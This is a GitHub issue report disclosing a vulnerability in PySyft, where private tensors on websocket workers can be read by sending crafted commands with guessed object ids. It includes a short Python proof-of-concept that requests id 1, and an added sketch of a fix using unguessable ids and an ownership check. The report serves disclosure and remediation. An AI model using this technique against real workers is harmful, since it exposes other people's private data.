
Private tensor disclosure #2432

Closed
youben11 opened this issue Aug 1, 2019 · 0 comments

@youben11 (Member) commented Aug 1, 2019

Describe the bug
Private tensors can be disclosed using their ids, either with prior knowledge or by brute force.

PoC

  1. Prepare the environment as described here https://github.com/OpenMined/PySyft/tree/dev/examples/pen_testing/
  2. Define the following functions to be used to steal the remote tensors
import binascii
import syft as sy          # required for sy.serde below; missing from the original snippet
from syft import codes

def command_msg(cname, oid, args: list, kwargs: dict) -> tuple:
    # Build a CMD message that invokes method `cname` on the remote object with id `oid`
    mtype = codes.MSGTYPE.CMD
    msg = (mtype, ((cname, oid, args, kwargs), []))
    return msg

def send_command(ws_client, message):
    # Serialize and hex-encode the message, send it over the worker's websocket,
    # then hex-decode and deserialize the reply
    serialized_message = sy.serde.serialize(message)
    ws_client.ws.send(str(binascii.hexlify(serialized_message)))
    response = ws_client.ws.recv()
    response = binascii.unhexlify(response[2:-1])  # strip the b'...' wrapper added by str()
    return sy.serde.deserialize(response)

msg = command_msg('__str__', 1, [], {})

You can then send this message to any WebsocketClientWorker and get the remote tensor.

Expected behavior

The execute_command from https://github.com/OpenMined/PySyft/blob/dev/syft/workers/base.py shouldn't allow this kind of usage.

Screenshots
I've changed the tensors myself to [73, 53, 1, 1, 1] in the run_websocket_server.py

[Screenshot: Screenshot_2019-08-01 Challenge Setup]
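As an added illustration of the expected behaviour (this is not PySyft code and not the reporter's PoC), the following simplified worker model shows the two controls that close the path described above: object ids that cannot be enumerated, and an ownership check in execute_command before any method is dispatched. The Worker class, the ALLOWED_COMMANDS set and the client ids are hypothetical names chosen for this example; the tensor value [73, 53, 1, 1, 1] is the one from the report.

```python
import secrets

# Methods a client may invoke on an object it owns (hypothetical allowlist).
ALLOWED_COMMANDS = {"__str__", "__len__", "__add__"}


class AccessDenied(Exception):
    """Raised for any object the requesting client may not touch."""


class Worker:
    """Simplified stand-in for a PySyft-style worker (hypothetical; not PySyft code).

    Two changes close the disclosure path from the issue:
      * object ids are random 128-bit values, so they cannot be enumerated;
      * execute_command checks that the requesting client owns the object
        before dispatching, instead of trusting the id alone.
    """

    def __init__(self):
        self._objects = {}  # object id -> stored value
        self._owners = {}   # object id -> id of the client that stored it

    def register(self, client_id, value):
        oid = secrets.token_hex(16)  # 32 hex characters, unguessable
        self._objects[oid] = value
        self._owners[oid] = client_id
        return oid

    def execute_command(self, client_id, cname, oid, args=(), kwargs=None):
        kwargs = kwargs or {}
        # Fail closed, and do not distinguish "no such id" from "not yours":
        # either way the caller learns nothing about other clients' objects.
        if self._owners.get(oid) != client_id:
            raise AccessDenied("object not accessible to this client")
        if cname not in ALLOWED_COMMANDS:
            raise AccessDenied(f"command {cname!r} not permitted")
        obj = self._objects[oid]
        return getattr(obj, cname)(*args, **kwargs)


def demo():
    """Constructed scenario: alice stores a value, another client probes for it."""
    w = Worker()
    oid = w.register("alice", [73, 53, 1, 1, 1])
    outcomes = {"owner": w.execute_command("alice", "__str__", oid)}
    # A small sequential guess (as in the report) and the real id without ownership
    for probe in (1, oid):
        try:
            w.execute_command("mallory", "__str__", probe)
            outcomes[probe] = "disclosed"
        except AccessDenied:
            outcomes[probe] = "denied"
    return outcomes


if __name__ == "__main__":
    print(demo())
```

The ownership map is the important part: with only random ids, a client that learns an id by other means (the "prior knowledge" case in the report) could still read the object, so the check in execute_command is what actually enforces privacy.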
